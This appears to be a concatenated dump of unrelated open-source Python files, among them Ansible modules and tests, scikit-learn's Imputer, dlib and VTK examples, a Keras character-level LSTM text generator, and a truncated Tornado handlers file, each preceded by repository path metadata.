# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
def set_module_args(args):
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args)
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except:
pass
fixture_data[path] = data
return data
class AnsibleExitJson(Exception):
pass
class AnsibleFailJson(Exception):
pass
class TestIosxrModule(unittest.TestCase):
def execute_module(self, failed=False, changed=False, commands=None,
sort=True, defaults=False):
self.load_fixtures(commands)
if failed:
result = self.failed()
self.assertTrue(result['failed'], result)
else:
result = self.changed(changed)
self.assertEqual(result['changed'], changed, result)
if commands:
if sort:
self.assertEqual(sorted(commands), sorted(result['commands']), result['commands'])
else:
self.assertEqual(commands, result['commands'], result['commands'])
return result
def failed(self):
def fail_json(*args, **kwargs):
kwargs['failed'] = True
raise AnsibleFailJson(kwargs)
with patch.object(basic.AnsibleModule, 'fail_json', fail_json):
with self.assertRaises(AnsibleFailJson) as exc:
self.module.main()
result = exc.exception.args[0]
self.assertTrue(result['failed'], result)
return result
def changed(self, changed=False):
def exit_json(*args, **kwargs):
if 'changed' not in kwargs:
kwargs['changed'] = False
raise AnsibleExitJson(kwargs)
with patch.object(basic.AnsibleModule, 'exit_json', exit_json):
with self.assertRaises(AnsibleExitJson) as exc:
self.module.main()
result = exc.exception.args[0]
self.assertEqual(result['changed'], changed, result)
return result
def load_fixtures(self, commands=None):
pass
|
berendkleinhaneveld/VTK
|
refs/heads/master
|
Imaging/Core/Testing/Python/TestSimpleImageExample.py
|
20
|
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Image pipeline
reader = vtk.vtkPNGReader()
reader.SetFileName("" + str(VTK_DATA_ROOT) + "/Data/fullhead15.png")
gradient = vtk.vtkSimpleImageFilterExample()
gradient.SetInputConnection(reader.GetOutputPort())
viewer = vtk.vtkImageViewer()
#viewer DebugOn
viewer.SetInputConnection(gradient.GetOutputPort())
viewer.SetColorWindow(1000)
viewer.SetColorLevel(500)
viewer.Render()
# --- end of script --
|
mitchrule/Miscellaneous
|
refs/heads/master
|
Django_Project/django/Lib/site-packages/pip/_vendor/html5lib/treewalkers/genshistream.py
|
1730
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
|
sparkslabs/kamaelia_
|
refs/heads/master
|
Code/Python/Kamaelia/Kamaelia/Util/Tokenisation/Simple.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
from Axon.Component import component
from Axon.Ipc import WaitComplete, producerFinished, shutdownMicroprocess
#import re, base64
from Kamaelia.Support.Data.Escape import escape, unescape
# we need escaping to substitute for tabs, newlines (either CRs and LFs),
# spaces, and the symbols we might use for opening and closing lists
substitutions="\09\x0a\x0d\x20[]"
from Kamaelia.Util.Marshalling import Marshaller, DeMarshaller
def tokenlists_to_lines():
return Marshaller(EscapedListMarshalling)
def lines_to_tokenlists():
return DeMarshaller(EscapedListMarshalling)
class EscapedListMarshalling:
def marshall(lst,term="\n"):
out = ""
for item in lst:
if isinstance(item,(list,tuple)):
out = out + "[ " + EscapedListMarshalling.marshall(item,term="] ")
else:
# out = out + re.sub("\\n","",base64.encodestring(item)) + " "
out = out + escape(item, substitutions) + " "
return out + term
marshall = staticmethod(marshall)
def demarshall(string):
out = []
outstack = []
for item in string.split(" "):
if len(item) and item != "\n":
if item=="[":
outstack.append(out)
newout=[]
out.append(newout)
out=newout
elif item=="]":
out = outstack.pop(-1)
else:
# out.append( base64.decodestring(item) )
out.append( unescape(item, substitutions) )
return out
demarshall = staticmethod(demarshall)
__kamaelia_prefabs__ = ( tokenlists_to_lines, lines_to_tokenlists, )
if __name__=="__main__":
# a few tests of this
tests = [
["hello","world"],
[["hello","world"]], # simple list nesting
[["hello world"]], # check spaces don't cause problems
["hello"," world",["1","2",[["7","alpha beta"],["5","6"]],"n"]], # lots of nesting
["hello\nworld\\today"], # newline and backslash chars
]
for test in tests:
marshalled = EscapedListMarshalling.marshall(test)
demarshalled = EscapedListMarshalling.demarshall(marshalled)
if test == demarshalled:
for char in marshalled[:-1]:
if ord(char) < 32:
raise RuntimeError("\nFAILED (LOWCHAR) : "+str(test))
if marshalled[-1] != "\n":
raise RuntimeError("\nFAILED (ENDTERM) : "+str(test))
print (".")
else:
raise RuntimeError("\nFAILED (MISMATCH) : "+str(test)+"\nIt was : "+str(demarshalled)+"\n")
|
n0trax/ansible
|
refs/heads/devel
|
lib/ansible/modules/web_infrastructure/jboss.py
|
72
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Jeroen Hoekx <jeroen.hoekx@dsquare.be>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: jboss
version_added: "1.4"
short_description: deploy applications to JBoss
description:
- Deploy applications to JBoss standalone using the filesystem
options:
deployment:
required: true
description:
- The name of the deployment
src:
required: false
description:
- The remote path of the application ear or war to deploy
deploy_path:
required: false
default: /var/lib/jbossas/standalone/deployments
description:
- The location in the filesystem where the deployment scanner listens
state:
required: false
choices: [ present, absent ]
default: "present"
description:
- Whether the application should be deployed or undeployed
notes:
- "The JBoss standalone deployment-scanner has to be enabled in standalone.xml"
- "Ensure no identically named application is deployed through the JBoss CLI"
author: "Jeroen Hoekx (@jhoekx)"
"""
EXAMPLES = """
# Deploy a hello world application
- jboss:
src: /tmp/hello-1.0-SNAPSHOT.war
deployment: hello.war
state: present
# Update the hello world application
- jboss:
src: /tmp/hello-1.1-SNAPSHOT.war
deployment: hello.war
state: present
# Undeploy the hello world application
- jboss:
deployment: hello.war
state: absent
"""
import os
import shutil
import time
from ansible.module_utils.basic import AnsibleModule
def is_deployed(deploy_path, deployment):
return os.path.exists(os.path.join(deploy_path, "%s.deployed" % deployment))
def is_undeployed(deploy_path, deployment):
return os.path.exists(os.path.join(deploy_path, "%s.undeployed" % deployment))
def is_failed(deploy_path, deployment):
return os.path.exists(os.path.join(deploy_path, "%s.failed" % deployment))
def main():
module = AnsibleModule(
argument_spec=dict(
src=dict(type='path'),
deployment=dict(required=True),
deploy_path=dict(type='path', default='/var/lib/jbossas/standalone/deployments'),
state=dict(choices=['absent', 'present'], default='present'),
),
required_if=[('state', 'present', ('src',))]
)
result = dict(changed=False)
src = module.params['src']
deployment = module.params['deployment']
deploy_path = module.params['deploy_path']
state = module.params['state']
if not os.path.exists(deploy_path):
module.fail_json(msg="deploy_path does not exist.")
deployed = is_deployed(deploy_path, deployment)
if state == 'present' and not deployed:
if not os.path.exists(src):
module.fail_json(msg='Source file %s does not exist.' % src)
if is_failed(deploy_path, deployment):
# Clean up old failed deployment
os.remove(os.path.join(deploy_path, "%s.failed" % deployment))
shutil.copyfile(src, os.path.join(deploy_path, deployment))
while not deployed:
deployed = is_deployed(deploy_path, deployment)
if is_failed(deploy_path, deployment):
module.fail_json(msg='Deploying %s failed.' % deployment)
time.sleep(1)
result['changed'] = True
if state == 'present' and deployed:
if module.sha1(src) != module.sha1(os.path.join(deploy_path, deployment)):
os.remove(os.path.join(deploy_path, "%s.deployed" % deployment))
shutil.copyfile(src, os.path.join(deploy_path, deployment))
deployed = False
while not deployed:
deployed = is_deployed(deploy_path, deployment)
if is_failed(deploy_path, deployment):
module.fail_json(msg='Deploying %s failed.' % deployment)
time.sleep(1)
result['changed'] = True
if state == 'absent' and deployed:
os.remove(os.path.join(deploy_path, "%s.deployed" % deployment))
while deployed:
deployed = not is_undeployed(deploy_path, deployment)
if is_failed(deploy_path, deployment):
module.fail_json(msg='Undeploying %s failed.' % deployment)
time.sleep(1)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
yagoocarvalho/ProjetoX9
|
refs/heads/master
|
projetox9/api.py
|
1
|
from .models import Models
from projetox9 import Config
from urllib.request import urlopen
from urllib.error import HTTPError, URLError
import json
class Api:
models = Models()
def get_occurrences(self):
pass
def get_occurrence(self, CPF, protocol):
return Models.Occurrence(Models.User(CPF, ""), " ", "Lol", "", -22, -23, "kek", protocol)
def get_person_info(self, CPF):
CPF = Utils.clean_CPF(CPF)
base_url = str(Config.FakeSiga_url)
path = '/api/Dados/findOne?filter={"where":{"CPF":"' + CPF + '"}}'
try:
f = urlopen(base_url + path)
except HTTPError as e:
return Api.models.User(CPF, None)
except URLError as e:
return Api.models.User(CPF, None)
data = json.loads(f.read().decode('utf-8'))
if data["FuncionarioAdministrativo"]:
user = self.models.Admin(data["CPF"], data["Nome"])
elif data["Professor"] or data["ProfessorVisitante"] or data["FuncionarioTerceirizado"]:
user = Api.models.Employee(data["CPF"], data["Nome"])
else:
user = Api.models.User(data["CPF"], data["Nome"])
return user
def get_person_name(self, CPF):
user = self.get_person_info(CPF)
return user.name
def set_occurrence(self, CPF, occurrence, date, description, lat, lng, place_name):
user = self.get_person_info(CPF)
oc = Models.Occurrence(user, date, occurrence, description, lat, lng, place_name)
oc.save()
return(oc)
def login(self, CPF, password):
return True, True
def signup(self, CPF, password, admin):
user = Models.Employee(CPF, self.get_person_name(CPF), password, admin)
return user
|
valexandersaulys/prudential_insurance_kaggle
|
refs/heads/master
|
venv/lib/python2.7/site-packages/sklearn/preprocessing/imputation.py
|
208
|
# Authors: Nicolas Tresegnie <nicolas.tresegnie@gmail.com>
# License: BSD 3 clause
import warnings
import numpy as np
import numpy.ma as ma
from scipy import sparse
from scipy import stats
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array
from ..utils import as_float_array
from ..utils.fixes import astype
from ..utils.sparsefuncs import _get_median
from ..utils.validation import check_is_fitted
from ..externals import six
zip = six.moves.zip
map = six.moves.map
__all__ = [
'Imputer',
]
def _get_mask(X, value_to_mask):
"""Compute the boolean mask X == missing_values."""
if value_to_mask == "NaN" or np.isnan(value_to_mask):
return np.isnan(X)
else:
return X == value_to_mask
def _most_frequent(array, extra_value, n_repeat):
"""Compute the most frequent value in a 1d array extended with
[extra_value] * n_repeat, where extra_value is assumed to be not part
of the array."""
# Compute the most frequent value in array only
if array.size > 0:
mode = stats.mode(array)
most_frequent_value = mode[0][0]
most_frequent_count = mode[1][0]
else:
most_frequent_value = 0
most_frequent_count = 0
# Compare to array + [extra_value] * n_repeat
if most_frequent_count == 0 and n_repeat == 0:
return np.nan
elif most_frequent_count < n_repeat:
return extra_value
elif most_frequent_count > n_repeat:
return most_frequent_value
elif most_frequent_count == n_repeat:
# Ties the breaks. Copy the behaviour of scipy.stats.mode
if most_frequent_value < extra_value:
return most_frequent_value
else:
return extra_value
class Imputer(BaseEstimator, TransformerMixin):
"""Imputation transformer for completing missing values.
Read more in the :ref:`User Guide <imputation>`.
Parameters
----------
missing_values : integer or "NaN", optional (default="NaN")
The placeholder for the missing values. All occurrences of
`missing_values` will be imputed. For missing values encoded as np.nan,
use the string value "NaN".
strategy : string, optional (default="mean")
The imputation strategy.
- If "mean", then replace missing values using the mean along
the axis.
- If "median", then replace missing values using the median along
the axis.
- If "most_frequent", then replace missing using the most frequent
value along the axis.
axis : integer, optional (default=0)
The axis along which to impute.
- If `axis=0`, then impute along columns.
- If `axis=1`, then impute along rows.
verbose : integer, optional (default=0)
Controls the verbosity of the imputer.
copy : boolean, optional (default=True)
If True, a copy of X will be created. If False, imputation will
be done in-place whenever possible. Note that, in the following cases,
a new copy will always be made, even if `copy=False`:
- If X is not an array of floating values;
- If X is sparse and `missing_values=0`;
- If `axis=0` and X is encoded as a CSR matrix;
- If `axis=1` and X is encoded as a CSC matrix.
Attributes
----------
statistics_ : array of shape (n_features,)
The imputation fill value for each feature if axis == 0.
Notes
-----
- When ``axis=0``, columns which only contained missing values at `fit`
are discarded upon `transform`.
- When ``axis=1``, an exception is raised if there are rows for which it is
not possible to fill in the missing values (e.g., because they only
contain missing values).
"""
def __init__(self, missing_values="NaN", strategy="mean",
axis=0, verbose=0, copy=True):
self.missing_values = missing_values
self.strategy = strategy
self.axis = axis
self.verbose = verbose
self.copy = copy
def fit(self, X, y=None):
"""Fit the imputer on X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Input data, where ``n_samples`` is the number of samples and
``n_features`` is the number of features.
Returns
-------
self : object
Returns self.
"""
# Check parameters
allowed_strategies = ["mean", "median", "most_frequent"]
if self.strategy not in allowed_strategies:
raise ValueError("Can only use these strategies: {0} "
" got strategy={1}".format(allowed_strategies,
self.strategy))
if self.axis not in [0, 1]:
raise ValueError("Can only impute missing values on axis 0 and 1, "
" got axis={0}".format(self.axis))
# Since two different arrays can be provided in fit(X) and
# transform(X), the imputation data will be computed in transform()
# when the imputation is done per sample (i.e., when axis=1).
if self.axis == 0:
X = check_array(X, accept_sparse='csc', dtype=np.float64,
force_all_finite=False)
if sparse.issparse(X):
self.statistics_ = self._sparse_fit(X,
self.strategy,
self.missing_values,
self.axis)
else:
self.statistics_ = self._dense_fit(X,
self.strategy,
self.missing_values,
self.axis)
return self
def _sparse_fit(self, X, strategy, missing_values, axis):
"""Fit the transformer on sparse data."""
# Imputation is done "by column", so if we want to do it
# by row we only need to convert the matrix to csr format.
if axis == 1:
X = X.tocsr()
else:
X = X.tocsc()
# Count the zeros
if missing_values == 0:
n_zeros_axis = np.zeros(X.shape[not axis], dtype=int)
else:
n_zeros_axis = X.shape[axis] - np.diff(X.indptr)
# Mean
if strategy == "mean":
if missing_values != 0:
n_non_missing = n_zeros_axis
# Mask the missing elements
mask_missing_values = _get_mask(X.data, missing_values)
mask_valids = np.logical_not(mask_missing_values)
# Sum only the valid elements
new_data = X.data.copy()
new_data[mask_missing_values] = 0
X = sparse.csc_matrix((new_data, X.indices, X.indptr),
copy=False)
sums = X.sum(axis=0)
# Count the elements != 0
mask_non_zeros = sparse.csc_matrix(
(mask_valids.astype(np.float64),
X.indices,
X.indptr), copy=False)
s = mask_non_zeros.sum(axis=0)
n_non_missing = np.add(n_non_missing, s)
else:
sums = X.sum(axis=axis)
n_non_missing = np.diff(X.indptr)
# Ignore the error, columns with a np.nan statistics_
# are not an error at this point. These columns will
# be removed in transform
with np.errstate(all="ignore"):
return np.ravel(sums) / np.ravel(n_non_missing)
# Median + Most frequent
else:
# Remove the missing values, for each column
columns_all = np.hsplit(X.data, X.indptr[1:-1])
mask_missing_values = _get_mask(X.data, missing_values)
mask_valids = np.hsplit(np.logical_not(mask_missing_values),
X.indptr[1:-1])
# astype necessary for bug in numpy.hsplit before v1.9
columns = [col[astype(mask, bool, copy=False)]
for col, mask in zip(columns_all, mask_valids)]
# Median
if strategy == "median":
median = np.empty(len(columns))
for i, column in enumerate(columns):
median[i] = _get_median(column, n_zeros_axis[i])
return median
# Most frequent
elif strategy == "most_frequent":
most_frequent = np.empty(len(columns))
for i, column in enumerate(columns):
most_frequent[i] = _most_frequent(column,
0,
n_zeros_axis[i])
return most_frequent
def _dense_fit(self, X, strategy, missing_values, axis):
"""Fit the transformer on dense data."""
X = check_array(X, force_all_finite=False)
mask = _get_mask(X, missing_values)
masked_X = ma.masked_array(X, mask=mask)
# Mean
if strategy == "mean":
mean_masked = np.ma.mean(masked_X, axis=axis)
# Avoid the warning "Warning: converting a masked element to nan."
mean = np.ma.getdata(mean_masked)
mean[np.ma.getmask(mean_masked)] = np.nan
return mean
# Median
elif strategy == "median":
if tuple(int(v) for v in np.__version__.split('.')[:2]) < (1, 5):
# In old versions of numpy, calling a median on an array
# containing nans returns nan. This is different is
# recent versions of numpy, which we want to mimic
masked_X.mask = np.logical_or(masked_X.mask,
np.isnan(X))
median_masked = np.ma.median(masked_X, axis=axis)
# Avoid the warning "Warning: converting a masked element to nan."
median = np.ma.getdata(median_masked)
median[np.ma.getmaskarray(median_masked)] = np.nan
return median
# Most frequent
elif strategy == "most_frequent":
# scipy.stats.mstats.mode cannot be used because it will no work
# properly if the first element is masked and if it's frequency
# is equal to the frequency of the most frequent valid element
# See https://github.com/scipy/scipy/issues/2636
# To be able access the elements by columns
if axis == 0:
X = X.transpose()
mask = mask.transpose()
most_frequent = np.empty(X.shape[0])
for i, (row, row_mask) in enumerate(zip(X[:], mask[:])):
row_mask = np.logical_not(row_mask).astype(np.bool)
row = row[row_mask]
most_frequent[i] = _most_frequent(row, np.nan, 0)
return most_frequent
def transform(self, X):
"""Impute all missing values in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
The input data to complete.
"""
if self.axis == 0:
check_is_fitted(self, 'statistics_')
# Copy just once
X = as_float_array(X, copy=self.copy, force_all_finite=False)
# Since two different arrays can be provided in fit(X) and
# transform(X), the imputation data need to be recomputed
# when the imputation is done per sample
if self.axis == 1:
X = check_array(X, accept_sparse='csr', force_all_finite=False,
copy=False)
if sparse.issparse(X):
statistics = self._sparse_fit(X,
self.strategy,
self.missing_values,
self.axis)
else:
statistics = self._dense_fit(X,
self.strategy,
self.missing_values,
self.axis)
else:
X = check_array(X, accept_sparse='csc', force_all_finite=False,
copy=False)
statistics = self.statistics_
# Delete the invalid rows/columns
invalid_mask = np.isnan(statistics)
valid_mask = np.logical_not(invalid_mask)
valid_statistics = statistics[valid_mask]
valid_statistics_indexes = np.where(valid_mask)[0]
missing = np.arange(X.shape[not self.axis])[invalid_mask]
if self.axis == 0 and invalid_mask.any():
if self.verbose:
warnings.warn("Deleting features without "
"observed values: %s" % missing)
X = X[:, valid_statistics_indexes]
elif self.axis == 1 and invalid_mask.any():
raise ValueError("Some rows only contain "
"missing values: %s" % missing)
# Do actual imputation
if sparse.issparse(X) and self.missing_values != 0:
mask = _get_mask(X.data, self.missing_values)
indexes = np.repeat(np.arange(len(X.indptr) - 1, dtype=np.int),
np.diff(X.indptr))[mask]
X.data[mask] = astype(valid_statistics[indexes], X.dtype,
copy=False)
else:
if sparse.issparse(X):
X = X.toarray()
mask = _get_mask(X, self.missing_values)
n_missing = np.sum(mask, axis=self.axis)
values = np.repeat(valid_statistics, n_missing)
if self.axis == 0:
coordinates = np.where(mask.transpose())[::-1]
else:
coordinates = mask
X[coordinates] = values
return X
|
mirzawaqasahmed/avocado-virt-tests
|
refs/heads/master
|
qemu/migration/migration.py
|
1
|
#!/usr/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
#
# Copyright: Red Hat Inc. 2013-2014
# Author: Lucas Meneghel Rodrigues <lmr@redhat.com>
from avocado.virt import test
class MigrationTest(test.VirtTest):
"""
Creates a VM and migrates it couple of times
:param migration_mode: Migration method
:param migration_iterations: How many times to migrate the VM
"""
def test_migrate(self):
self.vm.power_on()
migration_mode = self.params.get('migration_mode', default='tcp')
for _ in xrange(self.params.get('migration_iterations', default=4)):
self.vm.migrate(migration_mode)
self.vm.login_remote()
def cleanup(self):
if self.vm:
self.vm.power_off()
|
odin-detector/odin-data
|
refs/heads/master
|
tools/python/odin_data/testing/test_shared_buffer_manager.py
|
2
|
from odin_data.shared_buffer_manager import SharedBufferManager, SharedBufferManagerException
from nose.tools import assert_equal, assert_raises, assert_regexp_matches
from struct import Struct
shared_mem_name = "TestSharedBuffer"
buffer_size = 1000
num_buffers = 10
shared_mem_size = buffer_size * num_buffers
boost_mmap_mode = True
class TestSharedBufferManager:
@classmethod
def setup_class(cls):
# Create a shared buffer manager for use in all tests
cls.shared_buffer_manager = SharedBufferManager(
shared_mem_name, shared_mem_size,
buffer_size, remove_when_deleted=True, boost_mmap_mode=boost_mmap_mode)
@classmethod
def teardown_class(cls):
pass
def test_basic_shared_buffer(self):
# Test the shared buffer manager confoguration is expected
assert_equal(self.shared_buffer_manager.get_num_buffers(), num_buffers)
assert_equal(self.shared_buffer_manager.get_buffer_size(), buffer_size)
def test_existing_manager(self):
# Map the existing manager
existing_shared_buffer = SharedBufferManager(shared_mem_name, boost_mmap_mode=boost_mmap_mode)
# Test that the configuration matches the original
assert_equal(self.shared_buffer_manager.get_manager_id(), existing_shared_buffer.get_manager_id())
assert_equal(self.shared_buffer_manager.get_num_buffers(), existing_shared_buffer.get_num_buffers())
assert_equal(self.shared_buffer_manager.get_buffer_size(), existing_shared_buffer.get_buffer_size())
def test_existing_manager_absent(self):
# Attempt to map a shared buffer manager that doesn't already exist
absent_manager_name = "AbsentBufferManager"
with assert_raises(SharedBufferManagerException) as cm:
existing_shared_buffer = SharedBufferManager(absent_manager_name, boost_mmap_mode=boost_mmap_mode)
ex = cm.exception
assert_regexp_matches(ex.msg, "No shared memory exists with the specified name")
def test_existing_manager_already_exists(self):
# Attempt to create a shared buffer manager that already exists
with assert_raises(SharedBufferManagerException) as cm:
clobbered_shared_buffer = SharedBufferManager(shared_mem_name,
100, 100, True, boost_mmap_mode=boost_mmap_mode)
ex = cm.exception
assert_regexp_matches(ex.msg, "Shared memory with the specified name already exists")
def test_illegal_shared_buffer_index(self):
with assert_raises(SharedBufferManagerException) as cm:
buffer_address = self.shared_buffer_manager.get_buffer_address(-1)
ex = cm.exception
assert_regexp_matches(ex.msg, "Illegal buffer index specified")
with assert_raises(SharedBufferManagerException) as cm:
buffer_address = self.shared_buffer_manager.get_buffer_address(num_buffers)
ex = cm.exception
assert_regexp_matches(ex.msg, "Illegal buffer index specified")
def test_write_and_read_from_buffer(self):
data_block = Struct('QQQ')
values = (0xdeadbeef, 0x12345678, 0xaaaa5555aaaa5555)
raw_data = data_block.pack(*values)
self.shared_buffer_manager.write_buffer(0, raw_data)
read_raw = self.shared_buffer_manager.read_buffer(0, data_block.size)
read_values = data_block.unpack(read_raw)
assert_equal(values, read_values)
|
weinitom/robot
|
refs/heads/master
|
attention_tracker/dlib-18.16/python_examples/correlation_tracker.py
|
1
|
#!/usr/bin/python
# The contents of this file are in the public domain. See LICENSE_FOR_EXAMPLE_PROGRAMS.txt
#
# This example shows how to use the correlation_tracker from the dlib Python
# library. This object lets you track the position of an object as it moves
# from frame to frame in a video sequence. To use it, you give the
# correlation_tracker the bounding box of the object you want to track in the
# current video frame. Then it will identify the location of the object in
# subsequent frames.
#
# In this particular example, we are going to run on the
# video sequence that comes with dlib, which can be found in the
# examples/video_frames folder. This video shows a juice box sitting on a table
# and someone is waving the camera around. The task is to track the position of
# the juice box as the camera moves around.
#
# COMPILING THE DLIB PYTHON INTERFACE
# Dlib comes with a compiled python interface for python 2.7 on MS Windows. If
# you are using another python version or operating system then you need to
# compile the dlib python interface before you can use this file. To do this,
# run compile_dlib_python_module.bat. This should work on any operating
# system so long as you have CMake and boost-python installed.
# On Ubuntu, this can be done easily by running the command:
# sudo apt-get install libboost-python-dev cmake
#
# Also note that this example requires scikit-image which can be installed
# via the command:
# pip install -U scikit-image
# Or downloaded from http://scikit-image.org/download.html.
import os
import glob
import dlib
from skimage import io
# Path to the video frames
video_folder = os.path.join("..", "examples", "video_frames")
# Create the correlation tracker - the object needs to be initialized
# before it can be used
tracker = dlib.correlation_tracker()
win = dlib.image_window()
# We will track the frames as we load them off of disk
for k, f in enumerate(sorted(glob.glob(os.path.join(video_folder, "*.jpg")))):
print("Processing Frame {}".format(k))
img = io.imread(f)
# We need to initialize the tracker on the first frame
if k == 0:
# Start a track on the juice box. If you look at the first frame you
# will see that the juice box is contained within the bounding
# box (74, 67, 112, 153).
tracker.start_track(img, dlib.rectangle(74, 67, 112, 153))
else:
# Else we just attempt to track from the previous frame
tracker.update(img)
win.clear_overlay()
win.set_image(img)
win.add_overlay(tracker.get_position())
dlib.hit_enter_to_continue()
|
excelsimon/AI
|
refs/heads/master
|
NLP/5-DL-NLP/Char_RNN.py
|
1
|
# coding: utf-8
# # LSTM 文本生成 字符级别
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
import codecs
raw_text = codecs.open('Winston_Churchil.txt','r',encoding='utf-8').read()
raw_text = raw_text.lower()
chars = sorted(list(set(raw_text)))
char_to_int = dict((c, i) for i, c in enumerate(chars))
int_to_char = dict((i, c) for i, c in enumerate(chars))
for item in ((c, i) for i, c in enumerate(chars)):
print(item)
#训练集 输入前100个字符,输出下一个
seq_length = 100
x = []
y = []
for i in range(0, len(raw_text) - seq_length):
given = raw_text[i:i + seq_length]
predict = raw_text[i + seq_length]
x.append([char_to_int[char] for char in given])
y.append(char_to_int[predict])
# 此刻,楼上这些表达方式,类似就是一个词袋,或者说 index。
#
# 接下来做两件事:
# - 已经有了一个input的数字表达(index),要把它变成LSTM需要的数组格式: [样本数,时间步伐,特征维度]
# - 对于output,用one-hot做output的预测可以有更好的效果,相对于直接预测一个准确的y数值的话。
n_patterns = len(x)
n_vocab = len(chars)
# 把x变成LSTM需要的样子
x = numpy.reshape(x, (n_patterns, seq_length, 1))
# 简单normal到0-1之间
x = x / float(n_vocab)
# output变成one-hot
y = np_utils.to_categorical(y)
# # LSTM模型构建
model = Sequential()
model.add(LSTM(256,input_shape=(x.shape[1],x.shape[2]))) #不关心样本个数
model.add(Dropout(0.2))
model.add(Dense(y.shape[1],activation="softmax"))
model.compile(loss="categorical_crossentropy",optimizer="adam")
model.fit(x,y,nb_epoch=50,batch_size=4096)
def predict_next(input_array):
x = numpy.reshape(input_array, (1, seq_length, 1))
x = x / float(n_vocab)
y = model.predict(x)
return y
def string_to_index(raw_input):
res = []
for c in raw_input[(len(raw_input)-seq_length):]:
res.append(char_to_int[c])
return res
def y_to_char(y):
largest_index = y.argmax()
c = int_to_char[largest_index]
return c
def generate_article(init, rounds=200):
in_string = init.lower()
for i in range(rounds):
n = y_to_char(predict_next(string_to_index(in_string)))
in_string += n
return in_string
init = 'His object in coming to New York was to engage officers for that service. He came at an opportune moment'
article = generate_article(init)
print(article)
|
aclindsa/asink-python
|
refs/heads/master
|
src/server/handlers.py
|
1
|
# Copyright (C) 2011 Aaron Lindsay <aaron@aclindsay.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import tornado.web
import threading
import logging
from shared import events
from database import Database
from time import time
local = threading.local()
local.database = Database()
class WebHandler(tornado.web.RequestHandler):
def get(self):
self.write("Web interface not yet implemented, sorry\n")
class TimeSyncHandler(tornado.web.RequestHandler):
def get(self):
self.write(str(time()))
class UpdatesMixin(object):
waiters = {}
waiters_lock = threading.Lock() #TODO make locking per-userid
def wait_for_updates(self, userid, callback):
cls = UpdatesMixin
cls.waiters_lock.acquire()
if userid in cls.waiters:
cls.waiters[userid].append(callback)
else:
cls.waiters[userid] = [callback]
cls.waiters_lock.release()
def updates_ready(self, userid, events):
cls = UpdatesMixin
cls.waiters_lock.acquire()
if userid in cls.waiters:
